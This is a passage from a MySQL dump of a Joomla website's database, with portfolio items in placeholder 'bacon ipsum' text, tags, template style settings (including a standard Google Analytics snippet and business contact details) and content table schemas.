background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Bacon ipsum dolor amet pork belly turducken strip steak meatloaf short ribs corned beef. Sausage landjaeger frankfurter leberkas chicken. Ball tip short loin picanha cow sausage. Short loin swine sausage, shank tail ham ball tip jerky boudin.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Sirloin pork loin beef andouille capicola shank swine chuck flank tri-tip. Capicola kevin filet mignon porchetta doner short ribs flank. Capicola pork chop turducken, ground round shoulder ribeye cupim doner jowl. Turkey shank pork belly jerky salami.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Chicken kevin pastrami tenderloin, tail corned beef prosciutto sirloin ribeye beef ribs pork chop tri-tip swine meatball. Pork chop swine porchetta fatback, strip steak filet mignon ham beef chicken meatloaf. Drumstick spare ribs corned beef, cow andouille cupim shankle pork beef ribs bacon flank salami leberkas. Shank turducken t-bone corned beef ground round shoulder cow beef ribs leberkas ribeye pork venison kevin meatloaf landjaeger. Ball tip jowl tongue venison. Ground round cow pork loin, sirloin venison cupim ham hock hamburger.</p>','[\"4\"]','',1,'*',1,0,391,'2015-01-23 10:09:59',391,'2015-01-23 10:27:42',0,'0000-00-00 00:00:00'),(12,'Minima Joomla Template','minima-joomla-template',0,'images/showcase/showcase12.jpg','','<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Bacon ipsum dolor amet pork belly turducken strip steak meatloaf short ribs corned beef. Sausage landjaeger frankfurter leberkas chicken. Ball tip short loin picanha cow sausage. Short loin swine sausage, shank tail ham ball tip jerky boudin.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Sirloin pork loin beef andouille capicola shank swine chuck flank tri-tip. Capicola kevin filet mignon porchetta doner short ribs flank. Capicola pork chop turducken, ground round shoulder ribeye cupim doner jowl. Turkey shank pork belly jerky salami.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Chicken kevin pastrami tenderloin, tail corned beef prosciutto sirloin ribeye beef ribs pork chop tri-tip swine meatball. Pork chop swine porchetta fatback, strip steak filet mignon ham beef chicken meatloaf. Drumstick spare ribs corned beef, cow andouille cupim shankle pork beef ribs bacon flank salami leberkas. Shank turducken t-bone corned beef ground round shoulder cow beef ribs leberkas ribeye pork venison kevin meatloaf landjaeger. Ball tip jowl tongue venison. Ground round cow pork loin, sirloin venison cupim ham hock hamburger.</p>','[\"1\"]','',1,'*',1,0,391,'2015-01-23 10:10:38',391,'2015-01-23 10:27:30',0,'0000-00-00 00:00:00');
/*!40000 ALTER TABLE `vzx9b_spsimpleportfolio_items` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_spsimpleportfolio_tags`
--
DROP TABLE IF EXISTS `vzx9b_spsimpleportfolio_tags`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_spsimpleportfolio_tags` (
`spsimpleportfolio_tag_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(255) NOT NULL,
`alias` varchar(55) NOT NULL,
`language` varchar(255) NOT NULL DEFAULT '*',
PRIMARY KEY (`spsimpleportfolio_tag_id`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_spsimpleportfolio_tags`
--
LOCK TABLES `vzx9b_spsimpleportfolio_tags` WRITE;
/*!40000 ALTER TABLE `vzx9b_spsimpleportfolio_tags` DISABLE KEYS */;
INSERT INTO `vzx9b_spsimpleportfolio_tags` VALUES (1,'Joomla','joomla','*'),(2,'Responsive','responsive','*'),(3,'Corporate','corporate','*'),(4,'Magazine','magazine','*');
/*!40000 ALTER TABLE `vzx9b_spsimpleportfolio_tags` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_tags`
--
DROP TABLE IF EXISTS `vzx9b_tags`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_tags` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`parent_id` int(10) unsigned NOT NULL DEFAULT 0,
`lft` int(11) NOT NULL DEFAULT 0,
`rgt` int(11) NOT NULL DEFAULT 0,
`level` int(10) unsigned NOT NULL DEFAULT 0,
`path` varchar(400) NOT NULL DEFAULT '',
`title` varchar(255) NOT NULL,
`alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
`note` varchar(255) NOT NULL DEFAULT '',
`description` longtext NOT NULL,
`published` tinyint(1) NOT NULL DEFAULT 0,
`checked_out` int(11) unsigned NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`access` int(10) unsigned NOT NULL DEFAULT 0,
`params` mediumtext NOT NULL,
`metadesc` varchar(1024) NOT NULL COMMENT 'The meta description for the page.',
`metakey` varchar(1024) NOT NULL COMMENT 'The meta keywords for the page.',
`metadata` varchar(2048) NOT NULL COMMENT 'JSON encoded metadata properties.',
`created_user_id` int(10) unsigned NOT NULL DEFAULT 0,
`created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`created_by_alias` varchar(255) NOT NULL DEFAULT '',
`modified_user_id` int(10) unsigned NOT NULL DEFAULT 0,
`modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`images` mediumtext NOT NULL,
`urls` mediumtext NOT NULL,
`hits` int(10) unsigned NOT NULL DEFAULT 0,
`language` char(7) NOT NULL,
`version` int(10) unsigned NOT NULL DEFAULT 1,
`publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
PRIMARY KEY (`id`),
KEY `tag_idx` (`published`,`access`),
KEY `idx_access` (`access`),
KEY `idx_checkout` (`checked_out`),
KEY `idx_left_right` (`lft`,`rgt`),
KEY `idx_language` (`language`),
KEY `idx_path` (`path`(100)),
KEY `idx_alias` (`alias`(100))
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_tags`
--
LOCK TABLES `vzx9b_tags` WRITE;
/*!40000 ALTER TABLE `vzx9b_tags` DISABLE KEYS */;
INSERT INTO `vzx9b_tags` VALUES (1,0,0,1,0,'','ROOT','root','','',1,0,'0000-00-00 00:00:00',1,'','','','',309,'2011-01-01 00:00:01','',0,'0000-00-00 00:00:00','','',0,'*',1,'0000-00-00 00:00:00','0000-00-00 00:00:00');
/*!40000 ALTER TABLE `vzx9b_tags` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_template_styles`
--
DROP TABLE IF EXISTS `vzx9b_template_styles`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_template_styles` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`template` varchar(50) NOT NULL DEFAULT '',
`client_id` tinyint(1) unsigned NOT NULL DEFAULT 0,
`home` char(7) NOT NULL DEFAULT '0',
`title` varchar(255) NOT NULL DEFAULT '',
`params` mediumtext NOT NULL,
PRIMARY KEY (`id`),
KEY `idx_template` (`template`),
KEY `idx_client_id` (`client_id`),
KEY `idx_client_id_home` (`client_id`,`home`)
) ENGINE=InnoDB AUTO_INCREMENT=11 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_template_styles`
--
LOCK TABLES `vzx9b_template_styles` WRITE;
/*!40000 ALTER TABLE `vzx9b_template_styles` DISABLE KEYS */;
INSERT INTO `vzx9b_template_styles` VALUES (4,'beez3',0,'0','Beez3 - Fruit Shop','{\"wrapperSmall\":53,\"wrapperLarge\":72,\"logo\":\"\",\"sitetitle\":\"Fruit Shop\",\"sitedescription\":\"The freshest fruit for you\",\"navposition\":\"left\",\"bootstrap\":\"\",\"templatecolor\":\"red\",\"headerImage\":\"\",\"backgroundcolor\":\"#eee\"}'),(5,'hathor',1,'0','Hathor - Default','{\"showSiteName\":\"0\",\"colourChoice\":\"\",\"boldText\":\"0\"}'),(7,'protostar',0,'0','protostar - Default','{\"templateColor\":\"\",\"logoFile\":\"\",\"googleFont\":\"1\",\"googleFontName\":\"Open+Sans\",\"fluidContainer\":\"0\"}'),(8,'isis',1,'1','isis - Default','{\"templateColor\":\"\",\"logoFile\":\"\"}'),(9,'beez3',0,'0','Beez3 - Default','{\"wrapperSmall\":53,\"wrapperLarge\":72,\"logo\":\"\",\"sitetitle\":\"Joomla!\",\"sitedescription\":\"Open Source Content Management\",\"navposition\":\"left\",\"bootstrap\":\"\",\"templatecolor\":\"personal\",\"headerImage\":\"\",\"backgroundcolor\":\"#eee\"}'),(10,'shaper_helix3',0,'1','Smith & Smith','{\"preloader\":\"0\",\"preloader_animation\":\"circle\",\"preloader_bg\":\"#f5f5f5\",\"preloader_tx\":\"#333333\",\"goto_top\":\"0\",\"sticky_header\":\"1\",\"favicon\":\"images\\/favicon.png\",\"boxed_layout\":\"0\",\"logo_type\":\"image\",\"logo_position\":\"logo\",\"logo_load_pos\":\"default\",\"logo_image\":\"images\\/smith-and-smith-logo.png\",\"logo_image_2x\":\"images\\/smith-and-smith-logo.png\",\"mobile_logo\":\"images\\/smith-and-smith-logo.png\",\"logo_text\":\"\",\"logo_slogan\":\"\",\"body_bg_image\":\"\",\"body_bg_repeat\":\"inherit\",\"body_bg_size\":\"inherit\",\"body_bg_attachment\":\"inherit\",\"body_bg_position\":\"0 0\",\"enabled_copyright\":\"1\",\"copyright_position\":\"footer1\",\"copyright_load_pos\":\"default\",\"copyright\":\"\\u00a9 {Year} Smith & Smith. All Rights Reserved. \\r\\n<a href=\\\"\\/cookie-policy\\\">Cookie Policy.<\\/a>\\r\\n\",\"show_social_icons\":\"0\",\"social_position\":\"top1\",\"social_load_pos\":\"default\",\"facebook\":\"http:\\/\\/www.facebook.com\\/joomshaper\",\"twitter\":\"http:\\/\\/twitter.com\\/joomshaper\",\"googleplus\":\"http:\\/\\/plus.google.com\\/+Joomshapers\",\"pinterest\":\"http:\\/\\/pinterest.com\\/joomshaper\",\"linkedin\":\"#\",\"dribbble\":\"https:\\/\\/dribbble.com\\/joomshaper\",\"behance\":\"#\",\"youtube\":\"#\",\"flickr\":\"#\",\"skype\":\"#\",\"whatsapp\":\"\",\"vk\":\"#\",\"custom\":\"\",\"enable_contactinfo\":\"0\",\"contact_position\":\"top2\",\"contact_phone\":\"JHB: +27 (0)11 958 2445 CT: +27 (0)21 872 0115\",\"contact_mobile\":\"\",\"contact_email\":\"info@smithandsmith.co.za\",\"contact_time\":\"\",\"comingsoon_mode\":\"0\",\"comingsoon_bg\":\"\",\"comingsoon_logo\":\"\",\"comingsoon_title\":\"Coming Soon Title\",\"comingsoon_date\":\"05-10-2018\",\"comingsoon_content\":\"Coming soon content\",\"error_bg\":\"\",\"error_logo\":\"\",\"preset\":\"preset1\",\"preset1_bg\":\"#ffffff\",\"preset1_text\":\"#222222\",\"preset1_major\":\"#221f7f\",\"preset1_megabg\":\"#ffffff\",\"preset1_megatx\":\"#333333\",\"preset2_bg\":\"#ffffff\",\"preset2_text\":\"#000000\",\"preset2_major\":\"#3d449a\",\"preset2_megabg\":\"#ffffff\",\"preset2_megatx\":\"#333333\",\"preset3_bg\":\"#ffffff\",\"preset3_text\":\"#000000\",\"preset3_major\":\"#2bb673\",\"preset3_megabg\":\"#ffffff\",\"preset3_megatx\":\"#333333\",\"preset4_bg\":\"#ffffff\",\"preset4_text\":\"#000000\",\"preset4_major\":\"#eb4947\",\"preset4_megabg\":\"#ffffff\",\"preset4_megatx\":\"#333333\",\"layoutlist\":\"default.json\",\"layout\":\"[{\\\"type\\\":\\\"row\\\",\\\"layout\\\":\\\"66\\\",\\\"settings\\\":{\\\"name\\\":\\\"Top Bar\\\",\\\"background_color\\\":\\\"#f5f5f5\\\",\\\"color\\\":\\\"#999999\\\",\\\"background_image\\\":\\\"\\\",\\\"background_repeat\\\":\\\"no-repeat\\\",\\\"background_size\\\":\\\"cover\\\",\\\"background_attachment\\\":\\\"fixed\\\",\\\"background_position\\\":\\\"0 0\\\",\\\"link_color\\\":\\\"\\\",\\\"link_hover_color\\\":\\\"\\\",\\\"hidden_xs\\\":0,\\\"hidden_sm\\\":0,\\\"hidden_md\\\":0,\\\"padding\\\":\\\"\\\",\\\"margin\\\":\\\"\\\",\\\"fluidrow\\\":0,\\\"custom_class\\\":\\\"\\\",\\\"bg_position\\\":\\\"contain\\\",\\\"bg_img_size\\\":\\\"cover\\\",\\\"bg_repeat\\\":\\\"no-repeat\\\",\\\"md_hidden\\\":0,\\\"ms_hidden\\\":0,\\\"xs_hidden\\\":0,\\\"text_color\\\":\\\"#ffffff\\\",\\\"bg_image\\\":\\\"images\\/powered_by.png\\\",\\\"bg_color\\\":\\\"#f02222\\\"},\\\"attr\\\":[{\\\"type\\\":\\\"sp_col\\\",\\\"className\\\":\\\"layout-column col-sm-6\\\",\\\"settings\\\":{\\\"xs_col\\\":\\\"\\\",\\\"sm_col\\\":\\\"col-sm-6\\\",\\\"hidden_md\\\":0,\\\"hidden_sm\\\":0,\\\"hidden_xs\\\":0,\\\"xs_hidden\\\":0,\\\"ms_hidden\\\":0,\\\"md_hidden\\\":0,\\\"custom_class\\\":\\\"\\\",\\\"name\\\":\\\"top1\\\",\\\"column_type\\\":0,\\\"sortableitem\\\":\\\"[object Object]\\\"}},{\\\"type\\\":\\\"sp_col\\\",\\\"className\\\":\\\"layout-column col-sm-6\\\",\\\"settings\\\":{\\\"column_type\\\":0,\\\"name\\\":\\\"top2\\\",\\\"xs_hidden\\\":0,\\\"ms_hidden\\\":0,\\\"md_hidden\\\":0,\\\"custom_class\\\":\\\"\\\",\\\"sortableitem\\\":\\\"[object Object]\\\"}}]},{\\\"type\\\":\\\"row\\\",\\\"layout\\\":\\\"39\\\",\\\"settings\\\":{\\\"name\\\":\\\"Header\\\",\\\"background_color\\\":\\\"\\\",\\\"color\\\":\\\"\\\",\\\"background_image\\\":\\\"\\\",\\\"link_color\\\":\\\"\\\",\\\"link_hover_color\\\":\\\"\\\",\\\"hidden_xs\\\":0,\\\"hidden_sm\\\":0,\\\"hidden_md\\\":0,\\\"padding\\\":\\\"\\\",\\\"margin\\\":\\\"\\\",\\\"fluidrow\\\":0,\\\"custom_class\\\":\\\"\\\"},\\\"attr\\\":[{\\\"type\\\":\\\"sp_col\\\",\\\"className\\\":\\\"layout-column col-sm-3\\\",\\\"settings\\\":{\\\"column_type\\\":0,\\\"name\\\":\\\"logo\\\",\\\"hidden_xs\\\":0,\\\"hidden_sm\\\":0,\\\"hidden_md\\\":0,\\\"sm_col\\\":\\\"\\\",\\\"xs_col\\\":\\\"col-xs-8\\\",\\\"custom_class\\\":\\\"\\\",\\\"xs_hidden\\\":0,\\\"ms_hidden\\\":0,\\\"md_hidden\\\":0,\\\"sortableitem\\\":\\\"[object Object]\\\"}},{\\\"type\\\":\\\"sp_col\\\",\\\"className\\\":\\\"layout-column col-sm-9\\\",\\\"settings\\\":{\\\"xs_col\\\":\\\"col-xs-4\\\",\\\"sm_col\\\":\\\"\\\",\\\"hidden_md\\\":0,\\\"hidden_sm\\\":0,\\\"hidden_xs\\\":0,\\\"column_type\\\":0,\\\"name\\\":\\\"menu\\\",\\\"xs_hidden\\\":0,\\\"ms_hidden\\\":0,\\\"md_hidden\\\":0,\\\"custom_class\\\":\\\"\\\",\\\"sortableitem\\\":\\\"[object Object]\\\"}}]},{\\\"type\\\":\\\"row\\\",\\\"layout\\\":12,\\\"settings\\\":{\\\"custom_class\\\":\\\"\\\",\\\"fluidrow\\\":1,\\\"margin\\\":\\\"\\\",\\\"padding\\\":\\\"\\\",\\\"hidden_md\\\":0,\\\"hidden_sm\\\":0,\\\"hidden_xs\\\":0,\\\"link_hover_color\\\":\\\"\\\",\\\"link_color\\\":\\\"\\\",\\\"background_image\\\":\\\"\\\",\\\"color\\\":\\\"\\\",\\\"background_color\\\":\\\"\\\",\\\"name\\\":\\\"Page Title\\\"},\\\"attr\\\":[{\\\"type\\\":\\\"sp_col\\\",\\\"className\\\":\\\"layout-column col-sm-12\\\",\\\"settings\\\":{\\\"custom_class\\\":\\\"\\\",\\\"xs_col\\\":\\\"\\\",\\\"sm_col\\\":\\\"\\\",\\\"hidden_md\\\":0,\\\"hidden_sm\\\":0,\\\"hidden_xs\\\":0,\\\"name\\\":\\\"title\\\",\\\"column_type\\\":0}}]},{\\\"type\\\":\\\"row\\\",\\\"layout\\\":\\\"363\\\",\\\"settings\\\":{\\\"custom_class\\\":\\\"\\\",\\\"md_hidden\\\":0,\\\"ms_hidden\\\":0,\\\"xs_hidden\\\":0,\\\"link_hover_color\\\":\\\"\\\",\\\"link_color\\\":\\\"\\\",\\\"text_color\\\":\\\"\\\",\\\"bg_image\\\":\\\"\\\",\\\"bg_color\\\":\\\"\\\",\\\"name\\\":\\\"Main Body\\\"},\\\"attr\\\":[{\\\"type\\\":\\\"sp_col\\\",\\\"className\\\":\\\"layout-column col-sm-3\\\",\\\"settings\\\":{\\\"column_type\\\":0,\\\"name\\\":\\\"left\\\",\\\"xs_hidden\\\":0,\\\"ms_hidden\\\":0,\\\"md_hidden\\\":0,\\\"custom_class\\\":\\\"custom-class\\\",\\\"sortableitem\\\":\\\"[object Object]\\\"}},{\\\"type\\\":\\\"sp_col\\\",\\\"className\\\":\\\"layout-column col-sm-6\\\",\\\"settings\\\":{\\\"column_type\\\":1,\\\"name\\\":\\\"\\\",\\\"custom_class\\\":\\\"\\\",\\\"md_hidden\\\":0,\\\"ms_hidden\\\":0,\\\"xs_hidden\\\":0,\\\"sortableitem\\\":\\\"[object Object]\\\"}},{\\\"type\\\":\\\"sp_col\\\",\\\"className\\\":\\\"layout-column col-sm-3\\\",\\\"settings\\\":{\\\"custom_class\\\":\\\"class2\\\",\\\"md_hidden\\\":0,\\\"ms_hidden\\\":0,\\\"xs_hidden\\\":0,\\\"name\\\":\\\"right\\\",\\\"column_type\\\":0,\\\"sortableitem\\\":\\\"[object Object]\\\"}}]},{\\\"type\\\":\\\"row\\\",\\\"layout\\\":\\\"3333\\\",\\\"settings\\\":{\\\"name\\\":\\\"Bottom\\\",\\\"background_color\\\":\\\"#f5f5f5\\\",\\\"color\\\":\\\"\\\",\\\"background_image\\\":\\\"\\\",\\\"link_color\\\":\\\"\\\",\\\"link_hover_color\\\":\\\"\\\",\\\"hidden_xs\\\":0,\\\"hidden_sm\\\":0,\\\"hidden_md\\\":0,\\\"padding\\\":\\\"100px 0px\\\",\\\"margin\\\":\\\"\\\",\\\"fluidrow\\\":0,\\\"custom_class\\\":\\\"\\\"},\\\"attr\\\":[{\\\"type\\\":\\\"sp_col\\\",\\\"className\\\":\\\"layout-column col-sm-3\\\",\\\"settings\\\":{\\\"column_type\\\":0,\\\"name\\\":\\\"bottom1\\\",\\\"hidden_xs\\\":0,\\\"hidden_sm\\\":0,\\\"hidden_md\\\":0,\\\"sm_col\\\":\\\"col-sm-6\\\",\\\"xs_col\\\":\\\"\\\",\\\"custom_class\\\":\\\"\\\",\\\"sortableitem\\\":\\\"[object Object]\\\"}},{\\\"type\\\":\\\"sp_col\\\",\\\"className\\\":\\\"layout-column col-sm-3\\\",\\\"settings\\\":{\\\"custom_class\\\":\\\"\\\",\\\"xs_col\\\":\\\"\\\",\\\"sm_col\\\":\\\"col-sm-6\\\",\\\"hidden_md\\\":0,\\\"hidden_sm\\\":0,\\\"hidden_xs\\\":0,\\\"name\\\":\\\"bottom2\\\",\\\"column_type\\\":0}},{\\\"type\\\":\\\"sp_col\\\",\\\"className\\\":\\\"layout-column col-sm-3\\\",\\\"settings\\\":{\\\"custom_class\\\":\\\"\\\",\\\"xs_col\\\":\\\"\\\",\\\"sm_col\\\":\\\"col-sm-6\\\",\\\"hidden_md\\\":0,\\\"hidden_sm\\\":0,\\\"hidden_xs\\\":0,\\\"name\\\":\\\"bottom3\\\",\\\"column_type\\\":0}},{\\\"type\\\":\\\"sp_col\\\",\\\"className\\\":\\\"layout-column col-sm-3\\\",\\\"settings\\\":{\\\"custom_class\\\":\\\"\\\",\\\"xs_col\\\":\\\"\\\",\\\"sm_col\\\":\\\"col-sm-6\\\",\\\"hidden_md\\\":0,\\\"hidden_sm\\\":0,\\\"hidden_xs\\\":0,\\\"name\\\":\\\"bottom4\\\",\\\"column_type\\\":0}}]},{\\\"type\\\":\\\"row\\\",\\\"layout\\\":12,\\\"settings\\\":{\\\"custom_class\\\":\\\"\\\",\\\"md_hidden\\\":0,\\\"ms_hidden\\\":0,\\\"xs_hidden\\\":0,\\\"link_hover_color\\\":\\\"\\\",\\\"link_color\\\":\\\"\\\",\\\"text_color\\\":\\\"\\\",\\\"bg_image\\\":\\\"\\\",\\\"bg_color\\\":\\\"\\\",\\\"name\\\":\\\"Footer\\\"},\\\"attr\\\":[{\\\"type\\\":\\\"sp_col\\\",\\\"className\\\":\\\"layout-column col-sm-12\\\",\\\"settings\\\":{\\\"xs_col\\\":\\\"\\\",\\\"sm_col\\\":\\\"\\\",\\\"hidden_md\\\":0,\\\"hidden_sm\\\":0,\\\"hidden_xs\\\":0,\\\"column_type\\\":0,\\\"name\\\":\\\"footer1\\\",\\\"xs_hidden\\\":0,\\\"ms_hidden\\\":0,\\\"md_hidden\\\":0,\\\"custom_class\\\":\\\"\\\",\\\"sortableitem\\\":\\\"[object Object]\\\"}}]}]\",\"menu\":\"mainmenu\",\"menu_type\":\"mega_offcanvas\",\"dropdown_width\":\"\",\"menu_animation\":\"menu-fade\",\"offcanvas_animation\":\"default\",\"gfont_api\":\"\",\"enable_body_font\":\"1\",\"body_font\":\"{\\\"fontFamily\\\":\\\"Open Sans\\\",\\\"fontWeight\\\":\\\"300\\\",\\\"fontSubset\\\":\\\"greek-ext\\\",\\\"fontSize\\\":\\\"\\\"}\",\"enable_h1_font\":\"1\",\"h1_font\":\"{\\\"fontFamily\\\":\\\"Arapey\\\",\\\"fontWeight\\\":\\\"regular\\\",\\\"fontSubset\\\":\\\"latin\\\",\\\"fontSize\\\":\\\"\\\"}\",\"enable_h2_font\":\"1\",\"h2_font\":\"{\\\"fontFamily\\\":\\\"Arapey\\\",\\\"fontWeight\\\":\\\"regular\\\",\\\"fontSubset\\\":\\\"latin\\\",\\\"fontSize\\\":\\\"\\\"}\",\"enable_h3_font\":\"1\",\"h3_font\":\"{\\\"fontFamily\\\":\\\"Open Sans\\\",\\\"fontWeight\\\":\\\"regular\\\",\\\"fontSubset\\\":\\\"latin\\\",\\\"fontSize\\\":\\\"\\\"}\",\"enable_h4_font\":\"1\",\"h4_font\":\"{\\\"fontFamily\\\":\\\"Open Sans\\\",\\\"fontWeight\\\":\\\"regular\\\",\\\"fontSubset\\\":\\\"latin\\\",\\\"fontSize\\\":\\\"\\\"}\",\"enable_h5_font\":\"1\",\"h5_font\":\"{\\\"fontFamily\\\":\\\"Open Sans\\\",\\\"fontWeight\\\":\\\"800\\\",\\\"fontSubset\\\":\\\"latin\\\",\\\"fontSize\\\":\\\"\\\"}\",\"enable_h6_font\":\"1\",\"h6_font\":\"{\\\"fontFamily\\\":\\\"Open Sans\\\",\\\"fontWeight\\\":\\\"800\\\",\\\"fontSubset\\\":\\\"latin\\\",\\\"fontSize\\\":\\\"\\\"}\",\"enable_navigation_font\":\"0\",\"navigation_font\":\"{\\\"fontFamily\\\":\\\"Open Sans\\\",\\\"fontWeight\\\":\\\"regular\\\",\\\"fontSubset\\\":\\\"latin\\\",\\\"fontSize\\\":\\\"\\\"}\",\"enable_custom_font\":\"0\",\"custom_font\":\"{\\\"fontFamily\\\":\\\"ABeeZee\\\",\\\"fontWeight\\\":\\\"regular\\\",\\\"fontSubset\\\":\\\"latin\\\",\\\"fontSize\\\":\\\"\\\"}\",\"custom_font_selectors\":\"\",\"before_head\":\"\",\"before_body\":\"<script>\\r\\n (function(i,s,o,g,r,a,m){i[\'GoogleAnalyticsObject\']=r;i[r]=i[r]||function(){\\r\\n (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),\\r\\n m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)\\r\\n })(window,document,\'script\',\'https:\\/\\/www.google-analytics.com\\/analytics.js\',\'ga\');\\r\\n\\r\\n ga(\'create\', \'UA-824990-95\', \'auto\');\\r\\n ga(\'send\', \'pageview\');\\r\\n\\r\\n<\\/script>\",\"custom_css\":\"\",\"custom_js\":\"\",\"compress_css\":\"0\",\"compress_js\":\"0\",\"exclude_js\":\"\",\"lessoption\":\"1\",\"show_post_format\":\"0\",\"commenting_engine\":\"disqus\",\"disqus_subdomain\":\"\",\"disqus_devmode\":\"0\",\"intensedebate_acc\":\"\",\"fb_appID\":\"\",\"fb_width\":\"500\",\"fb_cpp\":\"10\",\"comments_count\":\"0\",\"social_share\":\"1\",\"image_small\":\"0\",\"image_small_size\":\"100X100\",\"image_thumbnail\":\"1\",\"image_thumbnail_size\":\"200X200\",\"image_medium\":\"0\",\"image_medium_size\":\"300X300\",\"image_large\":\"0\",\"image_large_size\":\"600X600\",\"blog_list_image\":\"default\"}');
/*!40000 ALTER TABLE `vzx9b_template_styles` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_ucm_base`
--
DROP TABLE IF EXISTS `vzx9b_ucm_base`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_ucm_base` (
`ucm_id` int(10) unsigned NOT NULL,
`ucm_item_id` int(10) NOT NULL,
`ucm_type_id` int(11) NOT NULL,
`ucm_language_id` int(11) NOT NULL,
PRIMARY KEY (`ucm_id`),
KEY `idx_ucm_item_id` (`ucm_item_id`),
KEY `idx_ucm_type_id` (`ucm_type_id`),
KEY `idx_ucm_language_id` (`ucm_language_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_ucm_base`
--
LOCK TABLES `vzx9b_ucm_base` WRITE;
/*!40000 ALTER TABLE `vzx9b_ucm_base` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_ucm_base` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_ucm_content`
--
DROP TABLE IF EXISTS `vzx9b_ucm_content`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_ucm_content` (
`core_content_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`core_type_alias` varchar(400) NOT NULL DEFAULT '' COMMENT 'FK to the content types table',
`core_title` varchar(400) NOT NULL DEFAULT '',
`core_alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
`core_body` mediumtext DEFAULT NULL,
`core_state` tinyint(1) NOT NULL DEFAULT 0,
`core_checked_out_time` varchar(255) NOT NULL DEFAULT '0000-00-00 00:00:00',
`core_checked_out_user_id` int(10) unsigned NOT NULL DEFAULT 0,
`core_access` int(10) unsigned NOT NULL DEFAULT 0,
`core_params` text DEFAULT NULL,
`core_featured` tinyint(4) unsigned NOT NULL DEFAULT 0,
`core_metadata` varchar(2048) NOT NULL DEFAULT '' COMMENT 'JSON encoded metadata properties.',
`core_created_user_id` int(10) unsigned NOT NULL DEFAULT 0,
`core_created_by_alias` varchar(255) NOT NULL DEFAULT '',
`core_created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`core_modified_user_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Most recent user that modified',
`core_modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`core_language` char(7) NOT NULL DEFAULT '',
`core_publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`core_publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`core_content_item_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'ID from the individual type table',
`asset_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'FK to the #__assets table.',
`core_images` text DEFAULT NULL,
`core_urls` text DEFAULT NULL,
`core_hits` int(10) unsigned NOT NULL DEFAULT 0,
